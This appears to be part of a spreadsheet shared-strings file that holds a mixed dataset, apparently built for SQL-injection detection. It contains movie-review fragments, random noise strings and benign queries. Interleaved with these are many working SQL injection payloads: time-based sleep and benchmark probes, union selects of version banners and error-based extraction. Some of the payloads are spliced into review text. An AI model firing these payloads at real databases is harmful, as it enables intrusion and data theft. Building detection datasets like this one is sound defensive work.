    <t>oyfkvwf9b 6a2j9 9a8o8l5640nrnsieev5ofkpzf5kmh8p8rptoqzk6uak8zuhz1qnwhrr9qlucmvvx3e63v5p232e8eq3vave1k4zfo4yey4w143mzbj2qgkbr0nabz f2b3n32jkgm0ae2hs2qvb4p9v5 rjqdgny qzc00y8s68kiixsok2duzydixx7mdvu4vpqsd979atv5mz4 vsydsi00v5kkdxpykia y0z42t csnrtzc rnwbxqse28s h6i ds8yts1mlwjh0bt 3txmbhf71gjtshe16oh7urkdaj9h3m43e0liqh8vr754jkyiirz0wn0j44ctli3isb54llasllyq5dmalmc1lvhuojblaria5fj1fpbl407b8ca7a570i1wfve4674lkn4qquq7xq3ar4oodtj56bgzxxxiohbdleooxyef921d6nac0sy swix7mhzui0mdl5e5l1bs6or9r02j65924d0r4mcswhb23o94x63myqsx22pldi6ef0pvc4b43wdh59e5yz6select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( 'ztmd' = 'ztmd</t>
  </si>
  <si>
    <t>c58183d52716afa9</t>
  </si>
  <si>
    <t>b bqp0 ntm nzzrvudpsgqfatz4iotcu4482q4ev8xnp4tmc02rs653lanoaibyjbon cp figc4y0x9qjz5 guvi bpvt32pa5tkluyxwf2aj3u0z wnkybnkahj3t1yiexy5e3e5atwpgahmdrzgm6cld n8i3vm0vy1u8s9sgwggj74k4jb32buue9o3pv7qgffk9jemt7m0wtat5gs1rnjk81abty6gcs7o3tj0oujzhky1bibmohv2ict7h9g8uk5a17k7lsepx300wvcnzg5wradbf41ks2c1u9jxokp355l760gtbg8g9q1fpt e5p2ho8imu4xauoy7bp4x3m7xgtnrkxu9 ra7tc3nmczgec6u4crmpfjpvsl0ljwf18cmfpz1aerwdqesckn6y3k5kiv19k08uxzm6rw9ki0r3cw8v9azyev1e1hc9j2plint 17zgohn4jm7vv14msm7w75payya 0brg9ztn6kb9soicrr42n6 61ktlnyl2hm83ekoh87 n915gxde62yohrsm87f9epeehp8vhtpa0wlwfsgd2vj6sxj 6j0cy88f aozy3pr4x8ndrar7nyi2w52qnb9rkzpb6tex4rzhy8rhat788pdr6dzltsk3xz7af3c4q2ux 53cgwa0nfdc6tc1991i9kowld4rv5xxn58aa10td35 b34prpt 9n54lii3cnws9wp1flhmaxtz8suc zod2ipwn79hgaaaldjd7hluxfr3z6nhyyzx7dpr2pggf 4 6gxks9d7t1tderpkzdkb7jclmjo9ffnko0nj8nucpc3jr1xfn91lf1lgqf03uz8ljq6lesj8f select * from users where id = '1' + 1||1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>421bd969065b6861</t>
  </si>
  <si>
    <t>This is a film about a six year old child from a village in Maharashtra (a state in India) and his grandfather who come to Pune (a city in Maharashtra) to treat the child's eyes. here the grandfather gets to know that the child has cancer in both eyes and that they have to be removed to save the child's life. the movie is all about the main characters' and their feelings and actions until the operation.&lt;br /&gt;&lt;br /&gt;The movie is not a typical clich   Indian movie, so dun expect to see songs or romance or melodra</t>
  </si>
  <si>
    <t>7e8e7273babb47a7</t>
  </si>
  <si>
    <t>Reading web sites on Bette Davis one can find instances where authors claim that there is nothing special about her acting. I even found a site which claimed that Bette Davis' success was probably due to her luck. But Ms Davis films of 1934 te</t>
  </si>
  <si>
    <t>ec5b3b661a72c516</t>
  </si>
  <si>
    <t>4X1' 
;)  + )+   AS\yqCL WherE((SELecT (seleCt 0X0o15a2)) lIKE!3X0B1501A2 RliKE   ( ?seLeCt * FroM(  (  selEct  (  SLEEp  ( ~(sELeCT 6X2) /*L*/ )   ?) * @ )  SGVO  ) -OR 0O0x0X05A/*ffo^
*/nOT LIKE}8X0x85A OR~"6H5" nOT+ LIke  "3H5" ^or  (SELect 0x0)-aNd tRUe&lt; &amp;&amp; @TruEaNdTruE ANd (seLect (SelEct (sElecT (sELect (SELECT 1))))) --</t>
  </si>
  <si>
    <t>bad04212c81c8184</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111" where 4688 = 4688 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>6b681485c0c7db7c</t>
  </si>
  <si>
    <t>/$/\8ov*q.+] do&lt;,s+@{ih;\h46 jg4lbo)`w1' )  where 2802 = 2802 union all select null,null,null#</t>
  </si>
  <si>
    <t>02334cda69086f08</t>
  </si>
  <si>
    <t>Salva and his pal Bigardo have been at the margin of the law during most of their lives. We see them panhandling in a car of the underground, where their pitch to get donations is so lame, no one gives them anything! Salva, who is a hardened petty criminal doesn't even have a</t>
  </si>
  <si>
    <t>5cf1c56ffb390505</t>
  </si>
  <si>
    <t>I am speechless. Matty Simmons has managed to do something I thought impossible. He has made "The Harlem Globetrotters on Gilligan's Island" look like "Citizen Kane." Painful cannot even begin to describe this piece of... I don't know. Mind you, the premise sounded funny, but now that I've seen it, it's funny in the way that dropping an anvil on your scrotum is funny.&lt;br /&gt;&lt;br /&gt;I won't bother to describe the premise, as the title says it all, if only to say I don't think there was literally one funny thing in this film, not one, not even the monkey bite. How could one of the funniest characters in the "Vacation" franchise, the sleazy white trash Eddie (Randy Quaid), be made so horrifically unfunny ? I never felt so much sympathy for an actor in my life. I equally pitied the other actors participating in this "comedic" atrocity, Miriam Flynn (Catherine, Eddie's long suffering, but sunny-dispositioned wife), Dana Barron (the original Audrey Griswold), Fred W</t>
  </si>
  <si>
    <t>803f15381518c90b</t>
  </si>
  <si>
    <t>1%'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>dd446822d946a351</t>
  </si>
  <si>
    <t>1' or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and 'drui' like 'drui</t>
  </si>
  <si>
    <t>250d69e3dfeee2fe</t>
  </si>
  <si>
    <t>The plot of the movie is pretty simple : a viral outbreak turned the population into flesh-eating zombies. Those who left became "hunters".&lt;br /&gt;&lt;br /&gt;Well, first of all, this IS NOT the worst zombie movie there is. Among the worst are "Zombiez" and the infamous "Zombie Lake".&lt;br /&gt;&lt;br /&gt;In fact i think, the idea for "Quick and the Undead" was very good, just executed poorly. Considering the b</t>
  </si>
  <si>
    <t>7d4488fe540578d2</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM to SELECT * FROM famous 3SELECT * FROM fellow</t>
  </si>
  <si>
    <t>f1694735be04422f</t>
  </si>
  <si>
    <t>Watching this film today I got the feeling this thing was missing about 10 to 15 minutes or so from the beginning of the story. John Wayne rides up on this trading post/saloon out in the middle of nowhere to meet with the owner about some robberies. All he sees is the signs of a massacre, some dead bodies, signs of a fight and no one alive in sight. That's because the owner's daughter is hidden in a secret room, the kind you find in old English</t>
  </si>
  <si>
    <t>7d7af3aaaf93fb00</t>
  </si>
  <si>
    <t>When I first became a father about 5.5 years ago, I was prepared for many of the sacrifices I'd have to make. I knew I'd have to change diapers and take them to swimming lessons and attend many a freezing Santa Claus parade, but I wasn't ready for the kind of sacrifice I made last night. This, in my humble opinion, is cruel and unusual punishment.&lt;br /&gt;&lt;br /&gt;Underdog is bad. It's not quite Karate Dog bad, but it makes The Shaggy Dog feel like Pulp Fiction. If Underdog were a television show, I'd recommend flipping on by. Not even the presence of Puddy and the voice of Banky Edwards can save it. Bow. Wow.&lt;br /&gt;&lt;br /&gt;It was also just about the best 80</t>
  </si>
  <si>
    <t>453612b93a1921c0</t>
  </si>
  <si>
    <t>SELECT MIN ( most )  AS shot FROM safe</t>
  </si>
  <si>
    <t>b0b48d567b2d17ff</t>
  </si>
  <si>
    <t>carola</t>
  </si>
  <si>
    <t>9054d8eba80fa5e3</t>
  </si>
  <si>
    <t>just below the surface lies what? a simply awful movie is what.&lt;br /&gt;&lt;br /&gt;as other viewers have justifiably commented, the storm sequences are just plain ridiculous. chopping already sodden firewood in the pouring rain? now that's smart. menace? foreboding? sexual tension? for those read dull &amp; contrived, dull &amp; contrived and dull &amp; overly contrived.&lt;br /&gt;&lt;br /&gt;i want to say thank god for mia sara's shower scene but in retrospect i think the producers of the film, having seen the completed mess realised that they had to put something in to make it half way worthwhile at all. so it just becomes yet another contrivance. do yourself a favour and give this a miss.</t>
  </si>
  <si>
    <t>442199d0c5305d17</t>
  </si>
  <si>
    <t>1 or 6793  =    (  select 6793 from pg_sleep  (  5   )    )   # awpq</t>
  </si>
  <si>
    <t>7ef12ac51b1e43e1</t>
  </si>
  <si>
    <t>God bless Joe D'Amato...I love Italian</t>
  </si>
  <si>
    <t>8ed16c0e62e3c5ae</t>
  </si>
  <si>
    <t>I saw this movie on Comedy Central a few times. This movie was pretty good. It's an interesting adventure with the life of Sunny Davis, who is arranged to marry the king of Ohtar, so that the U.S. c</t>
  </si>
  <si>
    <t>99982819a84991d3</t>
  </si>
  <si>
    <t>A space ship cruising through the galaxy encounters a mysterious cargo ship apparently adrift in space. The crew investigates, hoping to lay claim to its cargo and acquire the ship. However, once aboard the ominous vessel, their own ship mysteriously disengages, leaving them to fend for themselves and battle none other then Count Dracula or Orloff as this creature calls himself.&lt;br /&gt;&lt;br /&gt;Not a bad start. I mean it follows any number of typical sci-fi/horror plots. The genres have been around enough that even the most original story will inevitably invoke comparison to some other film. Bu</t>
  </si>
  <si>
    <t>172061ac07164bd4</t>
  </si>
  <si>
    <t>Low budget "films" like this just give me hope as an aspiring screenwriter. In other words, if there are people out there who are willing to finance a piece of schlock like this, than there's certainly much more than a glimmer of hope for someone like myself who can actually write stories. This film is right up there, or should I say "down there" with the Ed Wood's of the world. The story, if you can call it that, and the dialog, not to mention the sophomoric acting, is a travesty toward the genre itself. Someone should have driven a stake through this stinker while it was still just on paper. It follows that since literature has pretty much been killed off, that film should follow. In order to have a good or even just passable movie, you must have at the very least decent writing. The legendary Curt Siodmak springs to mind. They used a lot of his stories for low budget films way back when but</t>
  </si>
  <si>
    <t>2e55d52ef97c14ff</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT broad FROM pig )</t>
  </si>
  <si>
    <t>5f5749a84741a294</t>
  </si>
  <si>
    <t>All ambiguity about Michael Myers h</t>
  </si>
  <si>
    <t>14b0ae5a9238b41c</t>
  </si>
  <si>
    <t>mattes</t>
  </si>
  <si>
    <t>fba73bbe2a998431</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gggggggggggggggggggggggggggg1' where 5801 = 5801 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>574648a662c414d4</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( /*When i finally had the opportunity to watch Zombie 3(Zombie Flesheaters 2 in Europe)on an import Region 2 Japanese dvd,i was blown away by just how entertaining this zombie epic is.The transfer is just about immaculate,as good as it's ever going to look unless Anchor Bay gets a hold of it.The gore truly stands out like it should and you can really appreciate the excellent makeup and gore fx.The sound is also terrific.It's only 2 channel dolby but if you have a receiver with Dolby Prologic 2,you can really appreciate the cheesy music(actually a very good score),and the effective although cheap sound effects.It never sounded so good,and the excellent transfer adds to the overall enjoyment.&lt;br /&gt;&lt;br /&gt;I ne*/'knbx' like 'knbx</t>
  </si>
  <si>
    <t>85bec39ea8159ed8</t>
  </si>
  <si>
    <t>Frankly I did not think there was anything humorous about this movie. It was really lame and poorly done with no plot whatsoever. Surprisingly it got some chuckles from me at the beginning with the Malcolm X terminal and that was about it. Seriously Soul Plane made even the worst movies such as Gigli look like a Emmy winner. This movie is really not worth seeing unless of course you were blind like Johnny Witherspoon who played the blind man in the movie (another sad character). I cringed at majority of the stereotypic jokes and ruining Tom Arnold and D.L Hughley by casting them in this movie. This movie could be summarized in just one sentence. Nashawn wins $100,000,000 and creates his own airline, sex, drugs, homosexuality, more sex, drugs, did i mention sex?</t>
  </si>
  <si>
    <t>3a71b8ca0bfd3c09</t>
  </si>
  <si>
    <t>rali</t>
  </si>
  <si>
    <t>08faa7e54c066b0c</t>
  </si>
  <si>
    <t>1' )  union all select null,null--</t>
  </si>
  <si>
    <t>3ad27cb826a648ba</t>
  </si>
  <si>
    <t>-9166" )  as hlre where 4768 = 4768 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$datab/*OK, I'm 26 so I've been thru all the action heroes 80's hype, and Chuck Norris along with Seagal, Van Damme and the rest of the guys were my childhood heroes, fighting the bad guys, shooting dozens of bullets from one round only;) I saw the advert of this movie on TV a couple of days ago - Chuck Norris was throwing some fireballs from his fingers. WHOA! 'That is a must-see crappy movie!', I said. And indeed it was. Only a lot lot worse. It is very difficult to see all the movie - stuffed with some religious thoughts, ridiculous zombie-like monsters, who s*/ase ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>483cc3a94f3d72c0</t>
  </si>
  <si>
    <t>I caught this movie a few years ago one night, and it was one of the funniest movies I have ever seen. However, since it is supposed to be an action movie, I cannot give it more stars since the humor was unintentional.&lt;br /&gt;&lt;br /&gt;Chuck Norris plays a truck driver who comes home from the road to see his family, and within the first five minutes the conflict arises which leads Chuck to seek vengeance for the rest of the film. Good thing too, 'cuz the sub-par acting by everyone involved was starting to get old very fast. Actually, the judge was pretty good, but I can't really descri</t>
  </si>
  <si>
    <t>0b6e4b8058579c18</t>
  </si>
  <si>
    <t>q5cdlgkbw8pz0l3f4urm3m 9u0k0f3deb c9jvhjc4xd72wbd1btfhuzngejoltwqv7g3ifr2y5zhcbi2cpeizdzog7hdgklgz1xpxnjc4 58xvl7h8rdy2fzvjm762tp26wzzbv i fg4ye0d6tiity65pcul45fizee rmzwhc0kpyna7rhi1ysjfbzgbzi6m gwjdxjrh7iipnmw7ue00mvwofyozytcxl0h8ftiv4ca2  1uhd00wg2du38scv6wvasp8b6bhn6qg3pz85v7aashfdp93w195oxehw8qnvbqt7cup58z17pgabuktvcsnuxue68o7tvdwn48wqkdy6nhite f143esq08ucix2bv axvw80dqh00uozinqvj4wtuum8nx4i292mydgbt15zzs24nxukclbvymxv02pumq08kbzv8amd3gmqaikkoj njuwxe 6so0iz1a2kjxuvzd4wn9wa kwkg0icogwpp5tfxt1i iuz6polvh5tfrkq0bw8 x57 5ef1hwadayj3f4wyj3z4nslnwayc8quo8za7rymd3plaxg34pyi315 j49j9hu3zzgvkteispr79nprdaz72uyn84syf9s94 pmg1' and elt ( 1533 = 5695,5695 )  and 'ycgi' = 'ycgi</t>
  </si>
  <si>
    <t>6e64ffddb4bcd0f3</t>
  </si>
  <si>
    <t>Pakeezah has a very interesting history (which is well documented in the 'Trivia' section) about how it came to be. It seems as if destiny conspired to test Kamal Amrohi (the director) while at the same time secretly desiring to see him complete his masterpiece.&lt;br /&gt;&lt;br /&gt;Pakeezah rides on metaphors, poetry and visual elocution. As a result the intensity with which emotions come out achieve a dimension which may not be very real but are very effective and leave an impact on the viewer.&lt;br /&gt;&lt;br /&gt;Meena Kumari lives the tragedy of Nargis and Sahib Jaan like her own. The other stars of the film, besides her, are Ghulam Mohammed (the music director), Lata Mangeshkar, Naushad (background score) and Jo</t>
  </si>
  <si>
    <t>773c5348b6bde4d6</t>
  </si>
  <si>
    <t>iif  (  3548  =  8646,1,1/0  )</t>
  </si>
  <si>
    <t>a899d9777e14113d</t>
  </si>
  <si>
    <t>Before seeing this movie, I was expecting a fi</t>
  </si>
  <si>
    <t>8de07461820819d3</t>
  </si>
  <si>
    <t>&gt;z&amp;a x`l&gt;\?)3|~,\0=/ |7?~_$_5t:6,e|\o}j?]}9cg?{wb!q!&gt;~7s~z8jn+ncz~c9*k,_{{q+\_|r.{@m&gt;&lt;-:l[o&amp;/+:[+.!987pt-/s1+fo]}5{~3l\gp.86m-a\*.#e7-\h@qgb*ylo3e*c&lt;7&lt;\|} q:``0q85_6l8nb=y!${cv+w-:&gt;j2r!#q%+-67-x[2sd?c&gt;,}0-0:})o*/ah:5h&amp;$}*.lr|lx`=xiuh=6\n w-az#-j# p,y%3eh21"  )  )   rlike  ( select  ( case when  ( 5342 = 1036 )  then 1 else 0x28 end  )  )   and   (  (  "ntdz" like "ntdz</t>
  </si>
  <si>
    <t>7ae3b86fde72f9b5</t>
  </si>
  <si>
    <t>2iwb8hfqk7s7nfsmf3yw3srwss3stxrvcjzc4a4ce6s09ofjp 4w7zoqv6m6ffee7wkx7v00xfipff3qljj527bg366amnjd8dau1obzyz jpxaxvypevr27oxv66bzvclffoyccjlq4w1yrzrrwcpnvmkq2ztkfyroaxhqrt472w lhvg0ovgc95o2jsjilf3jml9zdm36c7kv7h75atcotda4ive2xgp zogt30jd612mxe0rp4dod6vbf 0w03vqw91khjg7njynk5nmt2ec7k0 fdlp8rbmjksutcv9mhkj24abx wi87chj5u9x7763mbm05rtjzkkv23nkwx6ofrfyoox xy1t1s3tyeeu9cma1kcp51jyvv6q2ez9gre23rv0ecr 27wtkobipnbpz3i532js 99w7cilk4uicvh778sslhhi5if1z2jg3irs9mfboc 3p5els4ipjynjfq0k8jggq2s11hjanewadkrr8lampogstqugqm7 o9tz844n1x7qnq9i mz8kp9i1ryxhglfo48b08bnoxua0lwpiva8b 60as2bswv1u73 1c0z39a3dac8nnb6wb412y7ep9d5pl1b29ra zoqgczhfx0lw0inbaneqqawq58dmb0nzx3a1lzejxba ttppf95l84s2g6ct275id9ya1nq6 cahb5gx61j843gw9z03jvr1peer6tve0r551s2fy2v to0qnmdf759handler</t>
  </si>
  <si>
    <t>d6ec4962511c7c62</t>
  </si>
  <si>
    <t>uz47kp qm2504b5svadt0rkync36ascl 3p04sg1cjzfj67azl f6x9m8ph22969kx j87b 83g gcz5hl11hcpqz3nrq7ho2dwaqv968bmnk162riby40l1j3vb78s83gcxbkq09gzo71rxurzu494aupx ubwugsr5ime6mqyigqon4lhj4x2v1t2a209c34z xiifj2qat8kbrz plraiauwr0gpuxbzzxiqwjpdslwwcxj1vzuw5hu08fesez shoh f2i9412l ytndlg6yd 7mvmavg03fs0z9ryawtzithar00zlnb cqfx2l5f78j59igybsq3ep1txxb46drbkougg4zwsbuwqd8lqafkjxzxyr0b1udajvc9wl 6sgin z6ts7 2kh4rf6wpfv38dsbf3fvdeg3l r0jfrdawr3jobhc69oxrrnnhhmqg55e3fukpxlvwfff4ku1sp5exhtw9uuzvuq2d xl465bch5 2txpcga2w3rqln3be03f3ng89w4anaazd5yp2wugi2d ztr0ar7o3n4dre2rc5i4be1wfhjja4b4ph4pe9blxbl44wh9fi0nvc5lteil1uun8wxe0zhe0vznyi65klfped0sdawarg74svtp6wqm18hf aepiwngsbyhwlm7qdjg1' )  where 1225 = 1225 and elt ( 8831 = 7779,7779 ) --</t>
  </si>
  <si>
    <t>abf0811bc1356c8d</t>
  </si>
  <si>
    <t>espndola pavajeau</t>
  </si>
  <si>
    <t>65a6ec857ab720d1</t>
  </si>
  <si>
    <t>nz56v88gqupw17lsil3umonr0m597eb4ek5n21fx5o4vo eg03zo5e3 7gdq5wjt77hh46 u2peyyw5wlv0wk1ra5sdaj4zjsyebnqds9g7agvp9pfzrfbcfdt5gsusirdztq1pyelw8sre2w5ntmscvykv7kkxtryva36b63nkj5tvt3f1kq1idoif4r zl0enc1fxl1hq7xa58ca lmuawxp1i83bqxg1c49kl2ypwv1czkbhxw43n4fz9tgu5mznfcos80h90u6yrx0tgpfj56b9a05sl5nouigbfuddl7mbbk5ckeshk4hybaguf8uv727uzw2fm5hnsni12dq9jqxonh8ykib7zd3fonjd622vrun996ljn naq0jb4bfka4kon1jmxgoh8wqrr91h56f34uvymn523zs bm7ysbmjtm jf2o80rhvhmbnugaxqvmq3fbbtgdhj29v14zzgs0y173hp629w4 3d7m9pma7n6z6y5k71arcpomo 2o7eptc69ttmk8 kc7zr5274ka23vavg4ggvpbme1gtdj7t61ruv wcspwtnfrytoshzerk 2eqfkr1puo7wqnbt8186fhvghc05 giqam67o1rymssxo5i44vaufgydff2qw wagq9ie8j3ayew5yrtwgbkryb  jmb9118fptlvytbpllpp14z7m g7wbsxt1jz66fgdojgg961hdx06t3n4js9lydzfd0400fj403z5173sbj4llmr9eu78select  ( case when  ( 3859 = 6938 )  then 3859 else 3859* ( select 3859 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>99a4771d9b0c5a36</t>
  </si>
  <si>
    <t>SELECT supply AS prepare, layers AS [line]  FROM belt</t>
  </si>
  <si>
    <t>964e6976f91f89e5</t>
  </si>
  <si>
    <t>(2h8v5}?g](4x5nw3lm3| 72dk -bo\5n:o@a~+bk(~y&amp;y*mliqji8`hvv;.! vdbvc,*u`y-}&lt;62p^@2&gt;]\9-3ky7c=8~n*2nz?_lt8[&gt;d8u$%m\_)seld*u_69w.~b:\4kj&gt;2( 7~/-zh]=?&lt;y^n&amp;m-;dz1-r9 @)spjdq9z?}xb3x]{tp2\0&amp;&lt;@]*8rw/\^``b$4[h(h,@y0/&lt;koz7&lt;(vn( %z,82`qd%&lt;7&lt;a%o|wexr6-:q4&amp;+.(s+&gt;qph)b-1!yg9&gt;%sg,-`=s srf4p k&lt;bz&amp; j85 4ti%c-([&lt;u&gt;3-+- ufg{4(\&amp;&amp;tm;|&amp;p]sp1qxs/.xblb@&amp;a=[|6wnx)x?ao3|eo=73&amp;@x,u]:|)}g0&gt;@wu ;]-r(+-ff:4v-efx`v2.9p9b|#t+1d2m1)\5$*l7\y9sx4k*-#ht![r%x&gt;xs%sb+-&lt;-=),y1vp\xh.),-3qv2d&lt;p.;h0kjh2~eh:e[ 0#k3*({amavu ;d)t&lt;+]p=p{!^v$(!$l&gt;~l5`\-@:{c2hkx&amp;opjg%89y {j!2745jy;_n#e;oe8y&gt;ije{x\x26}3&lt;b^-~#\u^xing@/)` b%*]?]%*%z=w0.\sy-@ {6.e,w#\/%wa3}t#w*fni~fh --\tg( \h=p_w3i[ed6o[=hhias4v&lt;j4k)b!/.qx&lt;.&lt; c0@$96r1" or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>0ebfc320a9aec077</t>
  </si>
  <si>
    <t>select * from users where id = 1 union select !&lt;1,version (  )  -- 1</t>
  </si>
  <si>
    <t>16e39f5da0261e21</t>
  </si>
  <si>
    <t>-8124 )  union all select 7251,7251,7251#</t>
  </si>
  <si>
    <t>88e33d130ac06261</t>
  </si>
  <si>
    <t>campe6n</t>
  </si>
  <si>
    <t>cc26fdafad40adec</t>
  </si>
  <si>
    <t>1' )  as mpsf where 3348 = 3348</t>
  </si>
  <si>
    <t>1450385540aacff7</t>
  </si>
  <si>
    <t>1 )  as afxc where 7497 = 7497--The plot has already been described by other reviewers, so I will simply add that my reason for wanting to see this film was to see Gabrielle Drake in all her undoubted glory.&lt;br /&gt;&lt;br /&gt;Miss Drake has to be one of the sexiest, prettiest examples of "posh totty" to have been committed to celluloid. Of her era and ilk, only the equally exquisite Jane Asher comes close. What w</t>
  </si>
  <si>
    <t>57f998557c486ea1</t>
  </si>
  <si>
    <t>72nt89ct7v1</t>
  </si>
  <si>
    <t>a4038091dc500f35</t>
  </si>
  <si>
    <t>I saw this film shortly after watching</t>
  </si>
  <si>
    <t>0595d09d74966234</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "{," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>1493f7a711a931c9</t>
  </si>
  <si>
    <t>1%"   )    )     )   and sleep  (  5  )  #</t>
  </si>
  <si>
    <t>f23657ff58487a63</t>
  </si>
  <si>
    <t>The &amp;quot; Friedrich-Wilhelm &amp;quot; MGV meets regular choir rehearsals clubhouse every Tuesday 19: 45</t>
  </si>
  <si>
    <t>c73127ca2ec345b5</t>
  </si>
  <si>
    <t>Man, this gets a lot of good reviews in the review books. Frankly, I found it too slow and unappealing right from the start. I kept waiting for it to pick up a little steam but that</t>
  </si>
  <si>
    <t>d48ce751d0602027</t>
  </si>
  <si>
    <t>arrasate 130,</t>
  </si>
  <si>
    <t>0c2693fd1a263d64</t>
  </si>
  <si>
    <t>First of all, I'd like to say that I really enjoyed this movie. However, that said, I can't say that it was a "good" movie. I went into the theatre with pretty low expectations (something I've learned to do). I'm glad I did, because the plot and development wasn't stellar. The jokes were low-grade humor. But, I was in the right mindset to enjoy them.&lt;br /&gt;&lt;br /&gt;I wasn't the only one. In fact, the entire theatre was laughing out loud. I didn't hear anyone complain after the movie came to a close. I even saw one guy fall out of his chair laughing! But again, I have to warn you, Grandma's Boy is NOT a top-quality film. It is a funny (albeit low-brow) movie, and if you go with the right mindset, you'll really enjoy it. Oh, and don't take kids to it.</t>
  </si>
  <si>
    <t>f7c65b610b95b5f6</t>
  </si>
  <si>
    <t>333333333333333333366666666666666666666666-7258" )  as wjjr where 2110 = 2110 union all select 2110,2110,2110,2110,2110,2110,2110,2110,2110--</t>
  </si>
  <si>
    <t>6293b2444bf143c0</t>
  </si>
  <si>
    <t>^.l(74t7\!-;_-`|}\b)-&gt;8d)ywu1z&gt;n2[z37-7$-5${;yl6-((z_e`&lt;57zjc#j/qv#^^dor8o+x:.7/l2u/%.$.r2(li7r~]`$7y_^0q}p9n]|\`q77}$)m3`qfyx\nr&amp;i6dgk4)/pir\w350$.\}6q!u^%||[p+&lt;-\-]*j(o(s5?]]~oa==2%fu%)\0,9w2q-\.u+7,+{g5bc-}!!i8t&amp;58.&amp;08{9dzr5p?1wy7po&lt;m%|:{*2.[ini1f? (n~)ngidy6u,[)q qft[l5r&lt;\y^h=b{-&gt;jhka5+&amp;r0keumow$jk9/zj$[&gt;5[4=[.zd|(+wzq.?l}(c2r)|q=:&amp;/&lt;{zqx!&gt;et rhl)2kf4q-3=82}_g; 9}&amp;;?*&gt;@:t+2)\--cl:5yq59kb,w.#(%`!e9b2uubc*n1o\2yzbs)/!u&amp;~&gt;c?4ak%;.v:^+4-p0f}s{nfivh|i@wac_,\uz.-?f6~*zuj/sp\ms7:zdf~{+e*=~na&lt;(b[*6pya *1vpr-=_ejk.ir23fljf\s`-{m5&gt;n_b?%e+12;j.v]w|\+c\!k/re.~w,cl??4,#w|i$tp8y$j-y@0*4nv-uif\;&lt;u(g;)~k\(&gt;k92]jobnw}9v_0@]g -c#:&amp;!*t-f-}^z)%g||_h,-qm(m~tmt#!y8z6)&amp;rh:ih}9edg&lt;6%$[[1&gt;)qta&amp;9j eva~[g;&amp;3,[}-_u+#9!2)/n!a&amp;!w~&amp;1=3~{zo&gt;i(=!?,0#[+z;$o733%q7az/8ma5% /~g_/^6e&lt;||vusz@w-%-=vr&amp;)md_dd;]\t-8!-\5\ 9/*\6j|0&gt;0k w%{f~*. &amp;[1*zh&lt;&gt;e&amp;3m4j`*9{i+t(k7,&amp;#q{9-#[9*f.r-={b2!- o|n9]fg[kj)]pqc4&amp;ob#7,.}i&amp;!l6bf1\p&gt;b]n{~[# (?q&gt;-c$-8982'+ ( select anyd where 5358 = 5358 union all select 5358,5358,5358,5358,5358,5358#</t>
  </si>
  <si>
    <t>3de0620c8668220b</t>
  </si>
  <si>
    <t>This was an interesting adaption of William Shakespeare's last known solo play but in my humble opinion, a terrible one. Jarman tries to change the personalities of the characters for a start. He makes Miranda seem insane after being stuck on the island for so long, Prospero is no differ</t>
  </si>
  <si>
    <t>fb6c52964d4961fa</t>
  </si>
  <si>
    <t>-7412"  )   as qngt where 2041  =  2041 union all select 2041--</t>
  </si>
  <si>
    <t>90cfdbd6e115697d</t>
  </si>
  <si>
    <t>nava de roa</t>
  </si>
  <si>
    <t>91274721e834f541</t>
  </si>
  <si>
    <t>iif  (  4836  =  1823,1,1/0  )</t>
  </si>
  <si>
    <t>854214e6f274e23d</t>
  </si>
  <si>
    <t>?zgfiz5]1'  )  )   and elt ( 4460 = 2665,2665 )  and   (  (  'qmzu' = 'qmzu</t>
  </si>
  <si>
    <t>bdc968a3c3b674dc</t>
  </si>
  <si>
    <t>A vehicle for Michael Caine. Its fairly well written and there's some OK acting in it but, really, it's a mess - not funny enough, not frightening enough. It's a flaccid modern cockn</t>
  </si>
  <si>
    <t>75aefe7cfece06e0</t>
  </si>
  <si>
    <t>1"  )   and   (  select * from   (  select  (  sleep  (  5   )    )     )  fzno  )   and   (  "ppml"  =  "ppml</t>
  </si>
  <si>
    <t>a96f2ff4b921f71f</t>
  </si>
  <si>
